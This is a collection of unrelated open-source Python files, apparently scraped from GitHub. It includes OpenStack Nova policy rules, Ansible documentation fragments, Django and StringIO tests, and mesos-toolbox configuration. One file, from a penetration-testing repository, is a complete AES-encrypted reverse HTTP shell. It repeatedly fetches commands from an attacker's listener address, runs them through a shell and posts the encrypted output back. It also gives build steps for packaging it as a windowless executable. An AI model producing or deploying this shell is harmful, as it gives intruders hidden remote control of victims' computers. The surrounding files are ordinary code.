# Copyright 2016 Cloudbase Solutions Srl # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_policy import policy from nova.policies import base BASE_POLICY_NAME = 'os_compute_api:os-instance-usage-audit-log' instance_usage_audit_log_policies = [ policy.DocumentedRuleDefault( BASE_POLICY_NAME, base.RULE_ADMIN_API, "List all usage audits and that occurred before a specified time " "for all servers on all compute hosts where usage auditing is " "configured", [ { 'method': 'GET', 'path': '/os-instance_usage_audit_log' }, { 'method': 'GET', 'path': '/os-instance_usage_audit_log/{before_timestamp}' } ]), ] def list_rules(): return instance_usage_audit_log_policies
goofwear/raspberry_pwn
refs/heads/master
src/pentest/revshells/encrypted_http_shell/shell.py
5
#!/usr/bin/python ########################################################################################################################## # # # AES Encrypted Reverse HTTP Shell by: # # Dave Kennedy (ReL1K) # http://www.secmaniac.com # ########################################################################################################################## # ########################################################################################################################## # # To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules # to make it easier. Can download from here: # http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip # ########################################################################################################################## # # This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc. # ########################################################################################################################## # ########################################################################################################################## # # Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction # so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary. # ########################################################################################################################## # # export VERSIONER_PYTHON_PREFER_32_BIT=yes # python Configure.py # python Makespec.py --onefile --noconsole shell.py # python Build.py shell/shell.spec # ########################################################################################################################### import urllib import urllib2 import httplib import subprocess import sys import base64 import os from Crypto.Cipher import AES # the block size for the cipher object; must be 16, 24, or 32 for AES BLOCK_SIZE = 32 # the character used for padding--with a block cipher such as AES, the value # you encrypt must be a multiple of BLOCK_SIZE in length. This character is # used to ensure that your value is always a multiple of BLOCK_SIZE PADDING = '{' # one-liner to sufficiently pad the text to be encrypted pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING # one-liners to encrypt/encode and decrypt/decode a string # encrypt with AES, encode with base64 EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) # secret key, change this if you want to be unique secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2" # create a cipher object using the random secret cipher = AES.new(secret) # TURN THIS ON IF YOU WANT PROXY SUPPORT PROXY_SUPPORT = "OFF" # THIS WILL BE THE PROXY URL PROXY_URL = "http://proxyinfo:80" # USERNAME FOR THE PROXY USERNAME = "username" # PASSWORD FOR THE PROXY PASSWORD = "password" # here is where we set all of our proxy settings if PROXY_SUPPORT == "ON": auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL, # PROXY SPECIFIED ABOVE user=USERNAME, # USERNAME SPECIFIED ABOVE passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) try: # our reverse listener ip address address = sys.argv[1] # our reverse listener port address port = sys.argv[2] # except that we didn't pass parameters except IndexError: print " \nAES Encrypted Reverse HTTP Shell by:" print " Dave Kennedy (ReL1K)" print " http://www.secmaniac.com" print "Usage: shell.exe <reverse_ip_address> <port>" sys.exit() # loop forever while 1: # open up our request handelr req = urllib2.Request('http://%s:%s' % (address,port)) # grab our response which contains what command we want message = urllib2.urlopen(req) # base64 unencode message = base64.b64decode(message.read()) # decrypt the communications message = DecodeAES(cipher, message) # quit out if we receive that command if message == "quit" or message == "exit": sys.exit() # issue the shell command we want proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # read out the data of stdout data = proc.stdout.read() + proc.stderr.read() # encrypt the data data = EncodeAES(cipher, data) # base64 encode the data data = base64.b64encode(data) # urlencode the data from stdout data = urllib.urlencode({'cmd': '%s'}) % (data) # who we want to connect back to with the shell h = httplib.HTTPConnection('%s:%s' % (address,port)) # set our basic headers headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} # actually post the data h.request('POST', '/index.aspx', data, headers)
Yannig/ansible
refs/heads/devel
lib/ansible/utils/module_docs_fragments/aireos.py
131
# # (c) 2017, James Mighion <@jmighion> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. class ModuleDocFragment(object): # Standard files documentation fragment DOCUMENTATION = """ options: provider: description: - A dict object containing connection details. default: null suboptions: host: description: - Specifies the DNS host name or address for connecting to the remote device over the specified transport. The value of host is used as the destination address for the transport. required: true port: description: - Specifies the port to use when building the connection to the remote. device. default: 22 username: description: - Configures the username to use to authenticate the connection to the remote device. This value is used to authenticate the SSH session. If the value is not specified in the task, the value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead. password: description: - Specifies the password to use to authenticate the connection to the remote device. This value is used to authenticate the SSH session. If the value is not specified in the task, the value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead. default: null timeout: description: - Specifies the timeout in seconds for communicating with the network device for either connecting or sending commands. If the timeout is exceeded before the operation is completed, the module will error. default: 10 ssh_keyfile: description: - Specifies the SSH key to use to authenticate the connection to the remote device. This value is the path to the key used to authenticate the SSH session. If the value is not specified in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE) will be used instead. """
Wyliodrin/wyliodrin-server
refs/heads/master
tests/localhost/servers/server3.py
1
# Test connection error logs import BaseHTTPServer, SimpleHTTPServer import SocketServer import ssl import os import json class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): l = [] def do_POST(self): length = int(self.headers['Content-Length']) r_json = json.loads(self.rfile.read(length).decode('utf-8')) ServerHandler.l += r_json["str"].split("[")[1:] if len(ServerHandler.l) >= 3: if ServerHandler.l[1].startswith("ERROR: ") and "XMPP connection error" in ServerHandler.l[1]: print "Second log is ERROR about XMPP connection error" else: print "Second log is not ERROR about XMPP connection error" os._exit(1) if ServerHandler.l[2].startswith("ERROR: ") and "Retrying to connect" in ServerHandler.l[2]: print "Third log is ERROR about XMPP connection retry" os._exit(0) else: print "Third log is not ERROR about XMPP connection retry" os._exit(1) httpd = BaseHTTPServer.HTTPServer(('localhost', 443), ServerHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./certificate/server.pem', server_side=True) print "Test server up and running" httpd.serve_forever()
glls/Cinnamon
refs/heads/master
files/usr/share/cinnamon/cinnamon-menu-editor/cme/util.py
6
# -*- coding: utf-8 -*- # Alacarte Menu Editor - Simple fd.o Compliant Menu Editor # Copyright (C) 2006 Travis Watkins # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Library General Public # License as published by the Free Software Foundation; either # version 2 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Library General Public License for more details. # # You should have received a copy of the GNU Library General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Suite 500, Boston, MA 02110-1335 USA import os import xml.dom.minidom import uuid from collections import Sequence from gi.repository import Gtk, GdkPixbuf, CMenu, GLib, Gdk DESKTOP_GROUP = GLib.KEY_FILE_DESKTOP_GROUP KEY_FILE_FLAGS = GLib.KeyFileFlags.KEEP_COMMENTS | GLib.KeyFileFlags.KEEP_TRANSLATIONS def fillKeyFile(keyfile, items): for key, item in items.items(): if item is None: continue if isinstance(item, bool): keyfile.set_boolean(DESKTOP_GROUP, key, item) elif isinstance(item, str): keyfile.set_string(DESKTOP_GROUP, key, item) elif isinstance(item, Sequence): keyfile.set_string_list(DESKTOP_GROUP, key, item) def getNameFromKeyFile(keyfile): return keyfile.get_string(DESKTOP_GROUP, "Name") def getUniqueFileId(name, extension): while 1: filename = name + '-' + str(uuid.uuid1()) + extension if extension == '.desktop': path = getUserItemPath() if not os.path.isfile(os.path.join(path, filename)) and not getItemPath(filename): break elif extension == '.directory': path = getUserDirectoryPath() if not os.path.isfile(os.path.join(path, filename)) and not getDirectoryPath(filename): break return filename def getUniqueRedoFile(filepath): while 1: new_filepath = filepath + '.redo-' + str(uuid.uuid1()) if not os.path.isfile(new_filepath): break return new_filepath def getUniqueUndoFile(filepath): filename, extension = os.path.split(filepath)[1].rsplit('.', 1) while 1: if extension == 'desktop': path = getUserItemPath() elif extension == 'directory': path = getUserDirectoryPath() elif extension == 'menu': path = getUserMenuPath() new_filepath = os.path.join(path, filename + '.' + extension + '.undo-' + str(uuid.uuid1())) if not os.path.isfile(new_filepath): break return new_filepath def getItemPath(file_id): for path in GLib.get_system_data_dirs(): file_path = os.path.join(path, 'applications', file_id) if os.path.isfile(file_path): return file_path return None def getUserItemPath(): item_dir = os.path.join(GLib.get_user_data_dir(), 'applications') if not os.path.isdir(item_dir): os.makedirs(item_dir) return item_dir def getDirectoryPath(file_id): for path in GLib.get_system_data_dirs(): file_path = os.path.join(path, 'desktop-directories', file_id) if os.path.isfile(file_path): return file_path return None def getUserDirectoryPath(): menu_dir = os.path.join(GLib.get_user_data_dir(), 'desktop-directories') if not os.path.isdir(menu_dir): os.makedirs(menu_dir) return menu_dir def getUserMenuPath(): menu_dir = os.path.join(GLib.get_user_config_dir(), 'menus') if not os.path.isdir(menu_dir): os.makedirs(menu_dir) return menu_dir def getSystemMenuPath(file_id): for path in GLib.get_system_config_dirs(): file_path = os.path.join(path, 'menus', file_id) if os.path.isfile(file_path): return file_path return None def getUserMenuXml(tree): system_file = getSystemMenuPath(os.path.basename(tree.get_canonical_menu_path())) name = tree.get_root_directory().get_menu_id() menu_xml = "<!DOCTYPE Menu PUBLIC '-//freedesktop//DTD Menu 1.0//EN' 'http://standards.freedesktop.org/menu-spec/menu-1.0.dtd'>\n" menu_xml += "<Menu>\n <Name>" + name + "</Name>\n " menu_xml += "<MergeFile type=\"parent\">" + system_file + "</MergeFile>\n</Menu>\n" return menu_xml class SurfaceWrapper: def __init__(self, surface): self.surface = surface def getIcon(item, widget): wrapper = SurfaceWrapper(None) pixbuf = None if item is None: return wrapper if isinstance(item, CMenu.TreeDirectory): gicon = item.get_icon() elif isinstance(item, CMenu.TreeEntry): app_info = item.get_app_info() gicon = app_info.get_icon() else: return wrapper if gicon is None: return wrapper icon_theme = Gtk.IconTheme.get_default() size = 24 * widget.get_scale_factor() info = icon_theme.lookup_by_gicon(gicon, size, 0) if info is None: return wrapper try: pixbuf = info.load_icon() except GLib.GError: return wrapper if pixbuf is None: return wrapper if pixbuf.get_width() != size or pixbuf.get_height() != size: pixbuf = pixbuf.scale_simple(size, size, GdkPixbuf.InterpType.HYPER) wrapper.surface = Gdk.cairo_surface_create_from_pixbuf (pixbuf, widget.get_scale_factor(), widget.get_window()) return wrapper def removeWhitespaceNodes(node): remove_list = [] for child in node.childNodes: if child.nodeType == xml.dom.minidom.Node.TEXT_NODE: child.data = child.data.strip() if not child.data.strip(): remove_list.append(child) elif child.hasChildNodes(): removeWhitespaceNodes(child) for node in remove_list: node.parentNode.removeChild(node) def menuSortKey(node): prefCats = ["administration", "preferences"] key = node.get_menu_id().lower() name = node.get_name().lower() if key in prefCats: name = "zzzz" + name # Hack for prefCats to be sorted at the end return name
bfirsh/django-old
refs/heads/master
tests/regressiontests/forms/validators.py
50
from unittest import TestCase from django import forms from django.core import validators from django.core.exceptions import ValidationError class TestFieldWithValidators(TestCase): def test_all_errors_get_reported(self): field = forms.CharField( validators=[validators.validate_integer, validators.validate_email] ) self.assertRaises(ValidationError, field.clean, 'not int nor mail') try: field.clean('not int nor mail') except ValidationError, e: self.assertEqual(2, len(e.messages))
tdruez/scancode-toolkit
refs/heads/master
src/scancode/__init__.py
3
# # Copyright (c) 2015 nexB Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/scancode-toolkit/ # The ScanCode software is licensed under the Apache License version 2.0. # Data generated with ScanCode require an acknowledgment. # ScanCode is a trademark of nexB Inc. # # You may not use this software except in compliance with the License. # You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # # When you publish or redistribute any data created with ScanCode or any ScanCode # derivative work, you must accompany this data with the following acknowledgment: # # Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. No content created from # ScanCode should be considered or used as legal advice. Consult an Attorney # for any legal advice. # ScanCode is a free software code scanning tool from nexB Inc. and others. # Visit https://github.com/nexB/scancode-toolkit/ for support and download. __version__ = '1.3.0'
labero/kupfer
refs/heads/master
waflib/extras/relocation.py
5
#! /usr/bin/env python # encoding: utf-8 """ Waf 1.6 Try to detect if the project directory was relocated, and if it was, change the node representing the project directory. Just call: waf configure build Note that if the project directory name changes, the signatures for the tasks using files in that directory will change, causing a partial build. """ import os from waflib import Build, ConfigSet, Task, Utils, Errors from waflib.TaskGen import feature, before_method, after_method EXTRA_LOCK = '.old_srcdir' old1 = Build.BuildContext.store def store(self): old1(self) db = os.path.join(self.variant_dir, EXTRA_LOCK) env = ConfigSet.ConfigSet() env.SRCDIR = self.srcnode.abspath() env.store(db) Build.BuildContext.store = store old2 = Build.BuildContext.init_dirs def init_dirs(self): if not (os.path.isabs(self.top_dir) and os.path.isabs(self.out_dir)): raise Errors.WafError('The project was not configured: run "waf configure" first!') srcdir = None db = os.path.join(self.variant_dir, EXTRA_LOCK) env = ConfigSet.ConfigSet() try: env.load(db) srcdir = env.SRCDIR except: pass if srcdir: d = self.root.find_node(srcdir) if d and srcdir != self.top_dir and getattr(d, 'children', ''): srcnode = self.root.make_node(self.top_dir) print("relocating the source directory %r -> %r" % (srcdir, self.top_dir)) srcnode.children = {} for (k, v) in d.children.items(): srcnode.children[k] = v v.parent = srcnode d.children = {} old2(self) Build.BuildContext.init_dirs = init_dirs def uid(self): try: return self.uid_ except AttributeError: # this is not a real hot zone, but we want to avoid surprizes here m = Utils.md5() up = m.update up(self.__class__.__name__.encode()) for x in self.inputs + self.outputs: up(x.path_from(x.ctx.srcnode).encode()) self.uid_ = m.digest() return self.uid_ Task.Task.uid = uid @feature('c', 'cxx', 'd', 'go', 'asm', 'fc', 'includes') @after_method('propagate_uselib_vars', 'process_source') def apply_incpaths(self): lst = self.to_incnodes(self.to_list(getattr(self, 'includes', [])) + self.env['INCLUDES']) self.includes_nodes = lst bld = self.bld self.env['INCPATHS'] = [x.is_child_of(bld.srcnode) and x.path_from(bld.bldnode) or x.abspath() for x in lst]
TechnoJays/robot2015
refs/heads/master
archive/src/driver_station/target.py
6
"""This module describes information about vision targets.""" class Side(object): """Enumeration for which side of the wall a target is on.""" LEFT = 0 RIGHT = 1 UNKNOWN = 2 EITHER = 3 class Target(object): """Target information.""" side = None distance = None angle = None is_hot = False confidence = None no_targets = False def __init__(self, **values): """Create a target using a dictionary. Args: **values: a keyword dictionary with the values. """ if values: self.__dict__.update(values) else: self.side = None self.distance = None self.angle = None self.is_hot = None self.confidence = None self.no_targets = False
ftomassetti/intellij-community
refs/heads/master
python/testData/refactoring/move/packageImport/after/src/a.py
45382
jonfaustman/django-frontend
refs/heads/master
run_tests.py
1
import os, sys from django.conf import settings import django DIRNAME = os.path.dirname(__file__) if django.VERSION[1] < 4: # If the version is NOT django 4 or greater # then remove the TZ setting. settings.configure( DATABASES={ 'default': { 'ENGINE': 'django.db.backends.sqlite3', } }, ROOT_URLCONF = 'djfrontend.tests.urls', STATIC_URL = '/static/', INSTALLED_APPS = ( 'django.contrib.staticfiles', 'djfrontend', ) ) else: settings.configure(DATABASES={ 'default': { 'ENGINE': 'django.db.backends.sqlite3', } }, ROOT_URLCONF = 'djfrontend.tests.urls', STATIC_URL = '/static/', INSTALLED_APPS = ( 'django.contrib.staticfiles', 'djfrontend', ), USE_TZ=True) try: # Django 1.7 needs this, but other versions dont. django.setup() except AttributeError: pass from django.test.runner import DiscoverRunner test_runner = DiscoverRunner(verbosity=1) failures = test_runner.run_tests(['djfrontend', ]) if failures: sys.exit(failures)
t-hey/QGIS-Original
refs/heads/master
python/plugins/processing/gui/ContextAction.py
6
# -*- coding: utf-8 -*- """ *************************************************************************** ContextAction.py --------------------- Date : August 2012 Copyright : (C) 2012 by Victor Olaya Email : volayaf at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Victor Olaya' __date__ = 'August 2012' __copyright__ = '(C) 2012, Victor Olaya' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' from qgis.PyQt.QtCore import QCoreApplication class ContextAction: def setData(self, itemData, toolbox): self.itemData = itemData self.toolbox = toolbox def tr(self, string, context=''): if context == '': context = 'ContextAction' return QCoreApplication.translate(context, string)
seann1/portfolio5
refs/heads/master
.meteor/dev_bundle/python/Lib/test/test_StringIO.py
84
# Tests StringIO and cStringIO import unittest import StringIO import cStringIO import types import array import sys from test import test_support class TestGenericStringIO(unittest.TestCase): # use a class variable MODULE to define which module is being tested # Line of data to test as string _line = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!' # Constructor to use for the test data (._line is passed to this # constructor) constructor = str def setUp(self): self._lines = self.constructor((self._line + '\n') * 5) self._fp = self.MODULE.StringIO(self._lines) def test_reads(self): eq = self.assertEqual self.assertRaises(TypeError, self._fp.seek) eq(self._fp.read(10), self._line[:10]) eq(self._fp.read(0), '') eq(self._fp.readline(0), '') eq(self._fp.readline(), self._line[10:] + '\n') eq(len(self._fp.readlines(60)), 2) self._fp.seek(0) eq(self._fp.readline(-1), self._line + '\n') def test_writes(self): f = self.MODULE.StringIO() self.assertRaises(TypeError, f.seek) f.write(self._line[:6]) f.seek(3) f.write(self._line[20:26]) f.write(self._line[52]) self.assertEqual(f.getvalue(), 'abcuvwxyz!') def test_writelines(self): f = self.MODULE.StringIO() f.writelines([self._line[0], self._line[1], self._line[2]]) f.seek(0) self.assertEqual(f.getvalue(), 'abc') def test_writelines_error(self): def errorGen(): yield 'a' raise KeyboardInterrupt() f = self.MODULE.StringIO() self.assertRaises(KeyboardInterrupt, f.writelines, errorGen()) def test_truncate(self): eq = self.assertEqual f = self.MODULE.StringIO() f.write(self._lines) f.seek(10) f.truncate() eq(f.getvalue(), 'abcdefghij') f.truncate(5) eq(f.getvalue(), 'abcde') f.write('xyz') eq(f.getvalue(), 'abcdexyz') self.assertRaises(IOError, f.truncate, -1) f.close() self.assertRaises(ValueError, f.write, 'frobnitz') def test_closed_flag(self): f = self.MODULE.StringIO() self.assertEqual(f.closed, False) f.close() self.assertEqual(f.closed, True) f = self.MODULE.StringIO("abc") self.assertEqual(f.closed, False) f.close() self.assertEqual(f.closed, True) def test_isatty(self): f = self.MODULE.StringIO() self.assertRaises(TypeError, f.isatty, None) self.assertEqual(f.isatty(), False) f.close() self.assertRaises(ValueError, f.isatty) def test_iterator(self): eq = self.assertEqual unless = self.assertTrue eq(iter(self._fp), self._fp) # Does this object support the iteration protocol? unless(hasattr(self._fp, '__iter__')) unless(hasattr(self._fp, 'next')) i = 0 for line in self._fp: eq(line, self._line + '\n') i += 1 eq(i, 5) self._fp.close() self.assertRaises(ValueError, self._fp.next) def test_getvalue(self): self._fp.close() self.assertRaises(ValueError, self._fp.getvalue) @test_support.bigmemtest(test_support._2G + 2**26, memuse=2.001) def test_reads_from_large_stream(self, size): linesize = 2**26 # 64 MiB lines = ['x' * (linesize - 1) + '\n'] * (size // linesize) + \ ['y' * (size % linesize)] f = self.MODULE.StringIO(''.join(lines)) for i, expected in enumerate(lines): line = f.read(len(expected)) self.assertEqual(len(line), len(expected)) self.assertEqual(line, expected) self.assertEqual(f.read(), '') f.seek(0) for i, expected in enumerate(lines): line = f.readline() self.assertEqual(len(line), len(expected)) self.assertEqual(line, expected) self.assertEqual(f.readline(), '') f.seek(0) self.assertEqual(f.readlines(), lines) self.assertEqual(f.readlines(), []) f.seek(0) self.assertEqual(f.readlines(size), lines) self.assertEqual(f.readlines(), []) # In worst case cStringIO requires 2 + 1 + 1/2 + 1/2**2 + ... = 4 # bytes per input character. @test_support.bigmemtest(test_support._2G, memuse=4) def test_writes_to_large_stream(self, size): s = 'x' * 2**26 # 64 MiB f = self.MODULE.StringIO() n = size while n > len(s): f.write(s) n -= len(s) s = None f.write('x' * n) self.assertEqual(len(f.getvalue()), size) class TestStringIO(TestGenericStringIO): MODULE = StringIO def test_unicode(self): if not test_support.have_unicode: return # The StringIO module also supports concatenating Unicode # snippets to larger Unicode strings. This is tested by this # method. Note that cStringIO does not support this extension. f = self.MODULE.StringIO() f.write(self._line[:6]) f.seek(3) f.write(unicode(self._line[20:26])) f.write(unicode(self._line[52])) s = f.getvalue() self.assertEqual(s, unicode('abcuvwxyz!')) self.assertEqual(type(s), types.UnicodeType) class TestcStringIO(TestGenericStringIO): MODULE = cStringIO def test_array_support(self): # Issue #1730114: cStringIO should accept array objects a = array.array('B', [0,1,2]) f = self.MODULE.StringIO(a) self.assertEqual(f.getvalue(), '\x00\x01\x02') def test_unicode(self): if not test_support.have_unicode: return # The cStringIO module converts Unicode strings to character # strings when writing them to cStringIO objects. # Check that this works. f = self.MODULE.StringIO() f.write(u'abcde') s = f.getvalue() self.assertEqual(s, 'abcde') self.assertEqual(type(s), str) f = self.MODULE.StringIO(u'abcde') s = f.getvalue() self.assertEqual(s, 'abcde') self.assertEqual(type(s), str) self.assertRaises(UnicodeEncodeError, self.MODULE.StringIO, u'\xf4') import sys if sys.platform.startswith('java'): # Jython doesn't have a buffer object, so we just do a useless # fake of the buffer tests. buffer = str class TestBufferStringIO(TestStringIO): constructor = buffer class TestBuffercStringIO(TestcStringIO): constructor = buffer class TestMemoryviewcStringIO(TestcStringIO): constructor = memoryview def test_main(): test_support.run_unittest(TestStringIO, TestcStringIO) with test_support.check_py3k_warnings(("buffer.. not supported", DeprecationWarning)): test_support.run_unittest(TestBufferStringIO, TestBuffercStringIO) test_support.run_unittest(TestMemoryviewcStringIO) if __name__ == '__main__': test_main()
adamtiger/tensorflow
refs/heads/master
tensorflow/python/keras/datasets/boston_housing/__init__.py
73
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Boston housing price regression dataset.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.keras._impl.keras.datasets.boston_housing import load_data del absolute_import del division del print_function
AppMinistry/mesos-toolbox
refs/heads/master
lib/configs/mesos_config.py
2
import hashlib, os, sys, time from lib.utils import Utils from lib.configs.defaults import Defaults class MesosConfigMeta(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(MesosConfigMeta, cls).__call__(*args, **kwargs) return cls._instances[cls] class MesosConfig(object): __metaclass__ = MesosConfigMeta @staticmethod def setup(program): from lib.config import Config Config.add_argument( "command", help="Command to execute.", metavar="COMMAND", default="", choices=[ "build", "docker", "show-releases", "show-builds", "show-mesos-sources", "show-packaging-sources", "remove-build","remove-mesos-sources", "remove-packaging-sources", "check-this-system" ] ) Config.add_argument( "--mesos-version", dest="mesos_version", help="Mesos version to build.", metavar="MESOS_VERSION", default=Utils.env_with_default("MESOS_VERSION","") ) Config.add_argument( "--mesos-master-branch", dest="mesos_master_branch", help="Mesos master branch name.", metavar="MESOS_MASTER_BRANCH_NAME", default=Utils.env_with_default("MESOS_MASTER_BRANCH_NAME","master") ) Config.add_argument( "--os", dest="operating_system", help="Operating system to build mesos for.", metavar="OPERATING_SYSTEM", default=Utils.env_with_default("OPERATING_SYSTEM","") ) Config.add_argument( "--mesos-deb-packaging", dest="deb_packaging_repository", help="mesos-deb-packaging git repository to use.", metavar="MESOS_DEB_PACKAGING_REPOSITORY", default=Utils.env_with_default("MESOS_DEB_PACKAGING_REPOSITORY", "https://github.com/mesosphere/mesos-deb-packaging.git") ) Config.add_argument( "--mesos-deb-packaging-sha", dest="deb_packaging_sha", help="mesos-deb-packaging sha to use.", metavar="MESOS_DEB_PACKAGING_SHA", default=Utils.env_with_default("MESOS_DEB_PACKAGING_SHA", "41157b81ac6c523987695ac58416bc2b975552f2") ) Config.add_argument( "--mesos-git-repository", dest="mesos_git_repository", help="Mesos git repository to use.", metavar="MESOS_GIT_REPOSITORY", default=Utils.env_with_default("MESOS_GIT_REPOSITORY", "https://github.com/apache/mesos.git") ) Config.add_argument( "--mesos-build-version", dest="mesos_build_version", help="Mesos build version.", metavar="MESOS_BUILD_VERSION", default=Utils.env_with_default("MESOS_BUILD_VERSION", "0.1.{}".format( str(int(time.time())) ) ) ) Config.add_argument( "--docker-templates", dest="docker_templates_dir", help="Docker templates base directory.", metavar="DOCKER_TEMPLATES_DIR", default=Utils.env_with_default("DOCKER_TEMPLATES_DIR", "{}/docker/mesos".format( os.path.dirname(os.path.dirname(os.path.dirname(__file__))) ))) Config.add_argument( "--packaging-patches", dest="packages_patches_dir", help="mesos-deb-packaging patches directory.", metavar="PACKAGES_PATCHES_DIR", default=Utils.env_with_default("PACKAGES_PATCHES_DIR", "{}/patches/mesos-packaging".format( os.path.dirname(os.path.dirname(os.path.dirname(__file__))) ))) Config.add_argument( "--mesos-patches", dest="mesos_patches_dir", help="mesos patches directory.", metavar="MESOS_PATCHES_DIR", default=Utils.env_with_default("MESOS_PATCHES_DIR", "{}/patches/mesos".format( os.path.dirname(os.path.dirname(os.path.dirname(__file__))) ))) Config.add_argument( "--source-dir", dest="source_dir", help="Directory in which the Mesos sources are stored.", metavar="SOURCE_DIR", default=Utils.env_with_default("SOURCE_DIR", Defaults.mesos_sources_dir() ) ) Config.add_argument( "--packages-dir", dest="packages_dir", help="Directory in which packaged versions of Mesos are stored.", metavar="PACKAGES_DIR", default=Utils.env_with_default("PACKAGES_DIR", Defaults.mesos_packages_dir() ) ) Config.add_argument( "--work-dir", dest="work_dir", help="Directory in which this program does the work.", metavar="WORK_DIR", default=Utils.env_with_default("WORK_DIR", os.path.expanduser("~/.mesos-toolbox/mesos/temp") ) ) return Config.ready(program) @staticmethod def command(): from lib.config import Config return Config.args().command @staticmethod def mesos_version(): from lib.config import Config return Config.args().mesos_version @staticmethod def mesos_master_branch(): from lib.config import Config return Config.args().mesos_master_branch @staticmethod def operating_system(): from lib.config import Config return Config.args().operating_system @staticmethod def deb_packaging_repository(): from lib.config import Config return Config.args().deb_packaging_repository @staticmethod def deb_packaging_sha(): from lib.config import Config return Config.args().deb_packaging_sha @staticmethod def mesos_git_repository(): from lib.config import Config return Config.args().mesos_git_repository @staticmethod def mesos_build_version(): from lib.config import Config return Config.args().mesos_build_version @staticmethod def docker_templates_dir(): from lib.config import Config return Config.args().docker_templates_dir @staticmethod def packages_patches_dir(): from lib.config import Config return Config.args().packages_patches_dir @staticmethod def mesos_patches_dir(): from lib.config import Config return Config.args().mesos_patches_dir @staticmethod def source_dir(): from lib.config import Config Utils.cmd("mkdir -p {}".format(Config.args().source_dir)) return Config.args().source_dir @staticmethod def packages_dir(): from lib.config import Config path = "{}/mesos".format(Config.args().packages_dir) Utils.cmd("mkdir -p {}".format(path)) return path @staticmethod def work_dir(): from lib.config import Config Utils.cmd("mkdir -p {}".format(Config.args().work_dir)) return Config.args().work_dir ## ## ADDITIONAL OPERATIONS: ## @staticmethod def mesos_git_repository_md5(): h = hashlib.md5() h.update(MesosConfig.mesos_git_repository()) return h.hexdigest() @staticmethod def deb_packaging_repository_md5(): h = hashlib.md5() h.update(MesosConfig.deb_packaging_repository()) return h.hexdigest() @staticmethod def mesos_repository_dir(): from lib.config import Config path = "{}/mesos/{}".format( Config.args().source_dir, MesosConfig.mesos_git_repository_md5() ) Utils.cmd("mkdir -p {}".format(path)) return path @staticmethod def deb_packaging_repository_dir(): from lib.config import Config path = "{}/mesos-packaging/{}".format( Config.args().source_dir, MesosConfig.deb_packaging_repository_md5() ) Utils.cmd("mkdir -p {}".format(path)) return path @staticmethod def supported_operating_systems(): from lib.config import Config return Utils.list_supported_operating_systems(Config.args().docker_templates_dir)
jnewland/home-assistant
refs/heads/ci
tests/components/image_processing/common.py
18
